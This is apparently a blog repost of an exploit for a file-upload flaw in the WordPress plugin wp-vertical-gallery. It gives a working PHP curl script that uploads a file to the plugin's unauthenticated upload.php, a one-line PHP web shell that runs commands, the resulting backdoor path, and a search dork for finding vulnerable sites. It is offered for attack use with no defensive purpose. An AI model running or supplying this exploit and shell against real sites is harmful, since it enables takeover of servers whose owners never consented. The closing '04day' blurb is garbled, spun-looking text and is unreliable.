WordPress plugin wp-vertical-gallery file Upload Vulnerability
<?php
#
# [>] Title : WordPress plugin wp-vertical-gallery file Upload Vulnerability
#
# [>] Author : sohaip-hackersohaip
# [+] bloog : http://www.tools-hack.com
# [+] FaCeb0ok : fb.me/sohaipbarika
# [+] TwiTter : @dorksql
# [+] dork : /wp-content/plugins/wp-vertical-gallery/
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec
# [!] Vendor : http://www.i13websolution.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin wp-vertical-gallery is suffer from File/Shell Upload Vulnerability
# remote attacker can upload file/shell/backdoor and exec commands.
#
#################################################################
#
# ExpLO!T :
# -------
$postData = array();
$postData[ 'file' ] = "@shell.php";
$sohaip = curl_init();
curl_setopt($sohaip, CURLOPT_URL, "http://[Target]/wp-content/plugins/wp-vertical-gallery/js/swfupload/js/upload.php");
curl_setopt($sohaip, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0)");
curl_setopt($sohaip, CURLOPT_POST, 1);
curl_setopt($sohaip, CURLOPT_POSTFIELDS, $postData );
curl_setopt($sohaip, CURLOPT_TIMEOUT, 0);
$dzhack = curl_exec ($sohaip);
curl_close($sohaip);
unset($sohaip);
echo $dzhack;
/*
[!] creat your shell file =>
_ shell.php :
<?php system($_GET['sohaip']); ?>
[>] Post the exploit
[+] Find you'r backdoor : ../wp-content/uploads/2017/05/sohaip.php?sohaip=[ CMD ]
[+] Or upload what you whant ^_^ ...
*/
#################################################################################
# ABOUT
# Facebook : https://www.facebook.com/Fallagahacker.Tn/
# forum : http://spyhackerz.com/forum/
# Blog : http://www.03day.ga/
#################################################################################
?>
04day is AN formidable multimedia system effort supported in 2011 to look at however technology can modification life within the future for an enormous thought audience.
Our original editorial insight was that technology had migrated from the so much fringes of the culture to absolutely the center as mobile technology created a replacement generation of digital shoppers. Now, we tend to board a stunning world of screens that has ushered in revolutions in media, transportation, and science. The longer term is incoming quicker than ever.
04day is that the go-to supply for school, digital culture and diversion content for its dedicated and cogent audience around the globe
No comments:
Post a Comment